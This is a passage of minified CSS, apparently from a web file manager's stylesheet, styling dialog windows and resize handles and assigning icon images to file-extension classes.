button.aui-state-highlight:active{background:#0076fc;}.aui-buttons button.disable,.aui-buttons button.disabled{opacity:0.3;filter:alpha(opacity=30);}.aui-outer{border:0px solid #63acff;-webkit-box-shadow:0px 5px 20px rgba(0,0,0,0.6);-moz-box-shadow:0px 5px 20px rgba(0,0,0,0.6);box-shadow:0px 5px 20px rgba(0,0,0,0.6);-webkit-transition:box-shadow 0.1s opacity 0.2s;-moz-transition:box-shadow 0.1s opacity 0.2s;-o-transition:box-shadow 0.1s opacity 0.2s;-ms-transition:box-shadow 0.1s opacity 0.2s;transition:box-shadow 0.1s opacity 0.2s;}.aui-state-lock .aui-nw,.aui-state-lock .aui-n,.aui-state-lock .aui-ne,.aui-state-lock .aui-w,.aui-state-lock .aui-e,.aui-state-lock .aui-sw,.aui-state-lock .aui-s,.aui-state-lock .aui-se{background:rgba(0,0,0,0.5);background:#000 \9 !important;opacity:0.5;filter:alpha(opacity=50);}.aui-title-bar{position:relative;height:100%;}.aui-title{height:31px;line-height:30px;padding:0 28px 0 10px;color:#fff;background-color:#7dbaff;}.aui-state-focus .aui-mask{display:none;}.aui-state-focus .aui-outer{-webkit-box-shadow:0px 5px 40px rgba(0,0,0,0.7);-moz-box-shadow:0px 5px 40px rgba(0,0,0,0.7);box-shadow:0px 5px 40px rgba(0,0,0,0.7);}.aui-state-focus .aui-title{background-color:#63acff;}.aui-state-drag .aui-title{cursor:move;cursor:-webkit-grabbing;cursor:grabbing;}.aui-min,.aui-max,.aui-close{display:block;position:absolute;text-decoration:none;outline:none;cursor:pointer;font-size:1.25em;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;color:#fff;border-top:none;top:0px;height:22px;width:35px;font-size:1.15em;line-height:22px;text-align:center;background-color:transparent;height:24px;width:38px;line-height:25px;color:#ffffff;font-family:FontAwesome;}.aui-min:hover,.aui-max:hover,.aui-close:hover{text-decoration:none;color:#fff;background-color:#1783ff;}.aui-close:hover{background:#cc0000;}.aui-min{right:82px;content:"\f068";}.aui-max{right:43px;content:"\f065";}.aui-close{right:5px;content:"\f00d";}.aui-min:before{content:"\f068";}.aui-max:before{content:"\f065";}.aui-close:before{content:"\f00d";}.aui-max,.aui-min{display:none;}.aui-state-no-title .aui-nw,.aui-state-no-title .aui-ne,.aui-state-no-title .aui-sw,.aui-state-no-title .aui-se{width:5px;height:5px;}.aui-state-no-title .aui-title-bar{bottom:0;_bottom:0;_margin-top:0;}.aui-state-no-title .aui-outer{box-shadow:none !important;border:none !important;}.aui-state-no-title .aui-inner{border:1px solid #aaa;}.aui-state-no-title .tips{padding:15px;padding-left:10px;}.aui-state-no-title .aui-nw,.aui-state-no-title .aui-n,.aui-state-no-title .aui-ne,.aui-state-no-title .aui-w,.aui-state-no-title .aui-e,.aui-state-no-title .aui-sw,.aui-state-no-title .aui-s,.aui-state-no-title .aui-se{background:rgba(0,0,0,0.1);background:#000 \9 !important;filter:alpha(opacity=10)!important;}.aui-state-no-title .aui-close,.aui-state-no-title .aui-max,.aui-state-no-title .aui-min{display:none;font-size:1em;}.dialog-max .aui-nw,.dialog-max .aui-ne,.dialog-max .aui-sw,.dialog-max .aui-se,.dialog-max .aui-w,.dialog-max .aui-e{width:0px;}.dialog-max .aui-sw,.dialog-max .aui-n,.dialog-max .aui-se{height:0px;}.dialog-max .aui-outer{border:none !important;}.dialog-can-resize .resize-handle{position:absolute;z-index:999999;display:block;}.dialog-can-resize .resize-top{cursor:n-resize;top:-3px;left:0px;height:7px;width:100%;}.dialog-can-resize .resize-bottom{cursor:s-resize;bottom:-3px;left:0px;height:7px;width:100%;}.dialog-can-resize .resize-right{cursor:e-resize;right:-3px;top:0px;width:7px;height:100%;}.dialog-can-resize .resize-left{cursor:w-resize;left:-3px;top:0px;width:7px;height:100%;}.dialog-can-resize .resize-bottom-right{cursor:se-resize;width:18px;height:18px;right:-7px;bottom:-7px;background:url('../../../images/common/dialog/resize_corner.png') no-repeat;opacity:0.4;filter:alpha(opacity=40);}.dialog-can-resize .resize-bottom-left{cursor:sw-resize;width:15px;height:15px;left:-7px;bottom:-7px;}.dialog-can-resize .resize-top-left{cursor:nw-resize;width:15px;height:15px;left:-7px;top:-7px;}.dialog-can-resize .resize-top-right{cursor:ne-resize;width:15px;height:15px;right:-5px;top:-7px;}.dialog-can-resize .aui-min,.dialog-can-resize .aui-max{display:block;}.dialog-min-size{width:250px !important;height:30px !important;}.dialog-min-size.dialog-no-title .aui-title,.dialog-min-size .aui-title{opacity:1 !important;}.dialog-min-size .aui-outer{width:250px;}.dialog-min-size .aui-header{height:30px;}.dialog-min-size .aui-title{text-align:left;padding-left:10px;}.dialog-min-size .aui-main,.dialog-min-size .aui-footer{display:none;}.dialog-min-size .resize-handle{display:none;}.dialog-no-title .aui-title-bar{position:absolute;z-index:99999;width:100%;height:30px;top:0;}.dialog-no-title .aui-title{opacity:0.01 !important;filter:alpha(opacity=1) !important;}.dialog-no-title .aui-inner{border:none;}.dialog-no-title .aui-nw,.dialog-no-title .aui-n,.dialog-no-title .aui-ne,.dialog-no-title .aui-w,.dialog-no-title .aui-e,.dialog-no-title .aui-sw,.dialog-no-title .aui-s,.dialog-no-title .aui-se{display:none;}.dialog-no-title .aui-outer .aui-min{right:80px;}.dialog-no-title .aui-outer .aui-min:before{content:"\f068" !important;}.dialog-no-title .aui-outer .aui-max{right:40px;}.dialog-no-title .aui-outer .aui-max:before{content:"\f065" !important;}.dialog-no-title .aui-outer .aui-close{right:0px;}.dialog-no-title .aui-outer .aui-close:before{content:"\f00d" !important;}.dialog-no-title .aui-outer .aui-min,.dialog-no-title .aui-outer .aui-max,.dialog-no-title .aui-outer .aui-close{display:block;position:absolute;text-decoration:none;outline:none;font-size:1.25em;-webkit-transition:all 0.1s;-moz-transition:all 0.1s;-o-transition:all 0.1s;-ms-transition:all 0.1s;transition:all 0.1s;color:#fff;top:0px;cursor:pointer;height:30px;line-height:30px;text-align:center;background-color:transparent;width:40px;font-family:FontAwesome;border:none;background-image:none;border-radius:0;}.dialog-no-title .aui-outer .aui-min:hover,.dialog-no-title .aui-outer .aui-max:hover,.dialog-no-title .aui-outer .aui-close:hover{color:#fff;border:none;box-shadow:none;background:#41acf8;background:rgba(0,0,0,0.4);}.dialog-no-title .aui-outer .aui-close:hover{background:#e81123;background:rgba(232,17,35,0.8);}.dialog-no-title.header-bg .aui-content .header{height:90px;background-color:#008def;background-image:linear-gradient(to bottom,#084998 0,#00a9fb 100%);color:#fff;position:relative;}.dialog-no-title.header-bg .aui-content .header .bg{background:url("../../../images/common/banner/box.png") 180px -220px no-repeat;width:100%;height:100%;position:absolute;opacity:0.7;}.dialog-no-title.dialog-max .aui-outer .aui-max{right:40px;}.dialog-no-title.dialog-max .aui-outer .aui-max:before{content:"\f066" !important;}body div.dialog-simple .aui-title-bar{width:100%;position:relative;bottom:0;height:100%;}body div.dialog-simple .aui-border{border:none;overflow:auto;}body div.dialog-simple .aui-outer{border:none;border-radius:none;box-shadow:none;background:none;}body div.dialog-simple .aui-inner{border:none;background:none;}body div.dialog-simple .aui-nw,body div.dialog-simple .aui-n,body div.dialog-simple .aui-ne,body div.dialog-simple .aui-w,body div.dialog-simple .aui-e,body div.dialog-simple .aui-sw,body div.dialog-simple .aui-s,body div.dialog-simple .aui-se{background:none;}body div.dialog-simple .aui-title{background:rgba(0,0,0,0.8);opacity:0.8;filter:alpha(opacity=80);border-radius:3px;border:none;height:31px;line-height:30px;padding:0 28px 0 10px;color:#fff;}body div.dialog-simple .aui-min,body div.dialog-simple .aui-max,body div.dialog-simple .aui-close{border:none;top:5px;position:absolute;text-decoration:none;outline:none;cursor:pointer;background-color:rgba(255,255,255,0.3);color:#fff;opacity:0.5;filter:alpha(opacity=50);height:22px;width:22px;font-size:1.15em;line-height:22px;text-align:center;border-radius:4px;font-family:FontAwesome;}body div.dialog-simple .aui-min:hover,body div.dialog-simple .aui-max:hover,body div.dialog-simple .aui-close:hover{text-decoration:none;color:#fff;background-color:#cc0000;}body div.dialog-simple .aui-min:active,body div.dialog-simple .aui-max:active,body div.dialog-simple .aui-close:active{color:fff;background-color:#f00;}body div.dialog-simple .aui-main{background:none !important;}body div.dialog-simple .aui-max{right:30px;}body div.dialog-simple .aui-min{right:56px;}body div.dialog-simple .aui-dialog,body div.dialog-simple .aui-border{background:none;}body div.dialog-simple .resize-bottom-right{background:none !important;}body div.dialog-simple .aui-header{opacity:0.01;filter:alpha(opacity=1);border:1px solid rgba(0,0,0,0.01);border-bottom:none;}body div.dialog-simple .aui-nw,body div.dialog-simple .aui-ne{height:0px;}body div.dialog-simple.aui-state-drag .aui-header,body div.dialog-simple .dialog-mouse-in .aui-header{opacity:1.0;filter:alpha(opacity=100);}body div.dialog-simple.dialog-can-resize .aui-max,body div.dialog-simple.dialog-can-resize .aui-min{display:block;}body div.dialog-simple.dialog-can-resize .aui-main{border:1px solid rgba(0,0,0,0.01);border-top:none;}body div.dialog-simple.dialog-can-resize.aui-state-drag .aui-main,body div.dialog-simple.dialog-can-resize .dialog-mouse-in .aui-main{border-color:rgba(0,0,0,0.2);}body div.dialog-simple.dialog-can-resize.aui-state-drag .aui-header,body div.dialog-simple.dialog-can-resize .dialog-mouse-in .aui-header{opacity:1.0;filter:alpha(opacity=100);border-color:rgba(0,0,0,0.2);}body div.dialog-simple.aui-state-drag .aui-header{opacity:1.0;filter:alpha(opacity=100);}body div.dialog-simple.dialog-max .aui-header{opacity:1.0;filter:alpha(opacity=100);}.x-item-small{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.x-item-file{background-repeat:no-repeat;background-size:cover;background-position:center;background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');width:100%;height:100%;display:inline-block;pointer-events:none;}.x-item-file.small{width:20px;height:20px;}.file-list-icon .file .ico .x-item-file{border-radius:5px;margin-top:6px;margin-top:4px;}.bindary-box .ico .x-item-file{width:90px;height:90px;margin-top:28px;}.file-list-list .file .ico .x-item-file,.file-list-split .file .ico .x-item-file{border:none;}.ztree li span.tree_icon .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.header-content #yarnball .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.task-tab .tabs .tab .x-item-file,.task-tab .tabs .tab img{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.tasktab-dragging.tab .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.tasktab-dragging.tab img{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.aui-title .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.edit-tab .tabs .tab .name .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.draggable-dragging .name .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.do-search-box .search-result .file-item .file-info .file-icon .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.context-menu-list .context-menu-item .font-icon.x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;margin-right:12px;}.context-menu-list .context-menu-item .font-icon.x-item-file:before{content:"";}.context-menu-list .context-menu-item img.x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;background:none;margin-right:12px;height:auto;}.aui-title .x-item-file.x-font-icon{font-size:12px;line-height:18px;color:#fff;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to 164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));}.x-txt.small,.x-textile.small,.x-inc.small,.x-log.small{background-image:url("../../../images/file_icon/icon_file/txt_small.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt_small.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt_small.png?ver=3.30',sizingMethod='scale');background-size:auto;}.x-php.small{background-image:url("../../../images/file_icon/icon_file/php_small.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php_small.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php_small.png?ver=3.30',sizingMethod='scale');background-size:auto;}.x-txt,.x-textile,.x-oexe,.x-inc,.x-csv,.x-log,.x-asc,.x-tsv,.x-lnk,.x-url,.x-webloc,.x-meta,.x-localized,.x-xib,.x-xsd,.x-storyboard,.x-plist,.x-csproj,.x-pch,.x-pbxproj,.x-local,.x-xcscheme,.x-manifest,.x-vbproj,.x-strings,.x-jshintrc,.x-sublime-project,.x-readme,.x-changes,.x-changelog,.x-version,.x-license,.x-changelog,.x-abap,.x-abc,.x-as,.x-asp,.x-aspx,.x-ada,.x-adb,.x-htaccess,.x-htgroups,.x-htgroups,.x-htpasswd,.x-asciidoc,.x-adoc,.x-asm,.x-a,.x-ahk,.x-bat,.x-cmd,.x-cpp,.x-c,.x-cc,.x-cxx,.x-h,.x-hh,.x-hpp,.x-ino,.x-c9search_results,.x-cirru,.x-cr,.x-clj,.x-cljs,.x-cbl,.x-cob,.x-coffee,.x-cf,.x-cson,.x-cakefile,.x-cfm,.x-cs,.x-css,.x-curly,.x-d,.x-di,.x-dart,.x-diff,.x-patch,.x-dockerfile,.x-dot,.x-dummy,.x-dummy,.x-e,.x-ge,.x-ejs,.x-ex,.x-exs,.x-elm,.x-erl,.x-hrl,.x-frt,.x-fs,.x-ldr,.x-ftl,.x-gcode,.x-feature,.x-.gitignore,.x-glsl,.x-frag,.x-vert,.x-gbs,.x-go,.x-groovy,.x-haml,.x-hbs,.x-handlebars,.x-tpl,.x-mustache,.x-hs,.x-hx,.x-html,.x-hta,.x-htm,.x-xhtml,.x-eex,.x-html.eex,.x-erb,.x-rhtml,.x-html.erb,.x-ini,.x-inf,.x-conf,.x-cfg,.x-prefs,.x-io,.x-jack,.x-jade,.x-java,.x-ji,.x-jl,.x-jq,.x-js,.x-jsm,.x-json,.x-jsp,.x-jsx,.x-latex,.x-ltx,.x-bib,.x-lean,.x-hlean,.x-less,.x-liquid,.x-lisp,.x-ls,.x-logic,.x-lql,.x-lsl,.x-lua,.x-lp,.x-lucene,.x-Makefile,.x-makemakefile,.x-gnumakefile,.x-makefile,.x-ocamlmakefile,.x-make,.x-md,.x-markdown,.x-mask,.x-matlab,.x-mz,.x-mel,.x-mc,.x-mush,.x-mysql,.x-nix,.x-nsi,.x-nsh,.x-m,.x-mm,.x-ml,.x-mli,.x-pas,.x-p,.x-pl,.x-pm,.x-pgsql,.x-php,.x-phtml,.x-shtml,.x-php3,.x-php4,.x-php5,.x-phps,.x-phpt,.x-aw,.x-ctp,.x-module,.x-ps1,.x-praat,.x-praatscript,.x-psc,.x-proc,.x-plg,.x-prolog,.x-properties,.x-proto,.x-py,.x-r,.x-cshtml,.x-rd,.x-rhtml,.x-rst,.x-rb,.x-ru,.x-gemspec,.x-rake,.x-guardfile,.x-rakefile,.x-gemfile,.x-rs,.x-sass,.x-scad,.x-scala,.x-scm,.x-sm,.x-rkt,.x-oak,.x-scheme,.x-scss,.x-sh,.x-bash,.x-bashrc,.x-sjs,.x-smarty,.x-tpl,.x-snippets,.x-soy,.x-space,.x-sql,.x-sqlserver,.x-styl,.x-stylus,.x-svg,.x-swift,.x-tcl,.x-tex,.x-toml,.x-twig,.x-swig,.x-ts,.x-typescript,.x-str,.x-vala,.x-vbs,.x-vb,.x-vm,.x-v,.x-vh,.x-sv,.x-svh,.x-vhd,.x-vhdl,.x-wlk,.x-wpgm,.x-wtest,.x-xml,.x-rdf,.x-rss,.x-wsdl,.x-xslt,.x-atom,.x-mathml,.x-mml,.x-xul,.x-xbl,.x-xaml,.x-xq,.x-yaml,.x-yml,.x-cer,.x-reg,.x-config,.x-srt,.x-ass,.x-lrc{background-image:url("../../../images/file_icon/icon_file/txt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');}.x-pl,.x-pm,.x-cgi,.x-as,.x-asm,.x-clj,.x-cbl,.x-cfm,.x-d,.x-diff,.x-dot,.x-ejs,.x-erl,.x-ftl,.x-go,.x-hs,.x-vbs,.x-haml,.x-erb,.x-jade,.x-json,.x-jq,.x-jsx,.x-ji,.x-tex,.x-lisp,.x-ls,.x-lsl,.x-lua,.x-lp,.x-matlab,.x-mel,.x-r,.x-yaml,.x-yml{background-image:url("../../../images/file_icon/icon_file/code.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/code.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/code.png?ver=3.30',sizingMethod='scale');}.x-bin,.x-hex,.x-zip,.x-pdf,.x-swf,.x-gzip,.x-rar,.x-arj,.x-tar,.x-gz,.x-cab,.x-tbz,.x-tbz2,.x-lzh,.x-uue,.x-bz2,.x-ace,.x-exe,.x-so,.x-dll,.x-chm,.x-rtf,.x-odp,.x-odt,.x-pages,.x-class,.x-psd,.x-ttf,.x-fla,.x-dmg,.x-dat,.x-ipa,.x-lib,.x-a,.x-apk,.x-so,.x-o{background-image:url("../../../images/file_icon/icon_file/bin.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bin.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bin.png?ver=3.30',sizingMethod='scale');}.x-music,.x-mp3,.x-wma,.x-mp2,.x-mid,.x-aac,.x-ogg,.x-oga,.x-webma,.x-wav,.x-m4a,.x-m3u,.x-m4a,.x-midi,.x-mid,.x-flac,.x-alac,.x-ape,.x-ac3{background-image:url("../../../images/file_icon/icon_file/music.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/music.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/music.png?ver=3.30',sizingMethod='scale');}.x-avi,.x-rm,.x-rmvb,.x-mpg,.x-mkv,.x-wmv,.x-mov,.x-mp4,.x-evo,.x-divx,.x-3gp,.x-asf,.x-ogv,.x-webmv,.x-cue,.x-hd,.x-hdmov,.x-mov,.x-mp4v,.x-mpeg,.x-ogm,.x-qt,.x-spx,.x-vob,.x-wmv,.x-xvid,.x-webm,.x-m4v,.x-mts,.x-mpe,.x-m2ts,.x-mpv,.x-cue{background-image:url("../../../images/file_icon/icon_file/movie.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/movie.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/movie.png?ver=3.30',sizingMethod='scale');}.x-flv,.x-f4v{background-image:url("../../../images/file_icon/icon_file/flv.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/flv.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/flv.png?ver=3.30',sizingMethod='scale');}.x-html,.x-htm,.x-url,.x-tpl,.x-lnk,.x-haml,.x-shtml,.x-webloc,.x-hta,.x-xhtml{background-image:url("../../../images/file_icon/icon_file/html.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');}.x-css,.x-less,.x-sass{background-image:url("../../../images/file_icon/icon_file/css.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');}.x-js,.x-coffee,.x-jsx{background-image:url("../../../images/file_icon/icon_file/js.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');}.x-xml,.x-config,.x-manifest,.x-xaml,.x-csproj,.x-vbproj{background-image:url("../../../images/file_icon/icon_file/xml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');}.x-cs,.x-asp,.x-aspx{background-image:url("../../../images/file_icon/icon_file/cs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');}.x-java,.x-jsp{background-image:url("../../../images/file_icon/icon_file/java.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');}.x-mm,.x-cc,.x-cxx,.x-cpp,.x-c,.x-m,.x-nc{background-image:url("../../../images/file_icon/icon_file/cpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');}.x-h,.x-hpp,.x-hh,.x-pch{background-image:url("../../../images/file_icon/icon_file/h.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');}.x-png,.x-jpg,.x-jpeg,.x-bmp,.x-gif,.x-picture,.x-ico,.x-svg,.x-cur,.x-webp,.x-tif,.x-tiff{background-image:url("../../../images/file_icon/icon_file/jpg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');}.x-make,.x-Makefile,.x-makefile,.x-GNUmakefile,.x-OCamlMakefile,.x-makemakefile{background-image:url("../../../images/file_icon/icon_file/makefile.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');}.x-iso,.x-vcd{background-image:url("../../../images/file_icon/icon_file/iso.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/iso.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/iso.png?ver=3.30',sizingMethod='scale');}.x-pkg,.x-package,.x-framework{background-image:url("../../../images/file_icon/icon_file/pkg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');}.x-7z,.x-apk,.x-ace,.x-arj,.x-bza,.x-cab,.x-cxr,.x-dgc,.x-gca,.x-gz,.x-gza,.x-iso,.x-jar,.x-lzh,.x-rar,.x-rk,.x-tar,.x-tbz,.x-tgz,.x-tlz,.x-txz,.x-yz1,.x-zip{background-image:url("../../../images/file_icon/icon_file/zip_all.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip_all.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip_all.png?ver=3.30',sizingMethod='scale');}.x-exe,.x-bin,.x-class,.x-a,.x-so{background-image:url("../../../images/file_icon/icon_file/exe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');}.x-ttf,.x-otf,.x-eot,.x-woff,.x-tiff,.x-ttc{background-image:url("../../../images/file_icon/icon_file/font.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');}.x-bat,.x-cmd,.x-sh,.x-bash,.x-bashrc{background-image:url("../../../images/file_icon/icon_file/cmd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');}.x-ini,.x-inf,.x-conf,.x-meta,.x-gitignore,.x-plist,.x-htaccess,.x-localized,.x-xcscheme,.x-storyboard,.x-xib,.x-strings,.x-pbxproj{background-image:url("../../../images/file_icon/icon_file/ini.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');}.x-md,.x-markdown{background-image:url("../../../images/file_icon/icon_file/md.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/md.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/md.png?ver=3.30',sizingMethod='scale');}.x-file{background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');}.x-accdb{background-image:url("../../../images/file_icon/icon_file/accdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/accdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/accdb.png?ver=3.30',sizingMethod='scale');}.x-7z{background-image:url("../../../images/file_icon/icon_file/7z.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/7z.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/7z.png?ver=3.30',sizingMethod='scale');}.x-ai{background-image:url("../../../images/file_icon/icon_file/ai.png");background-image:none 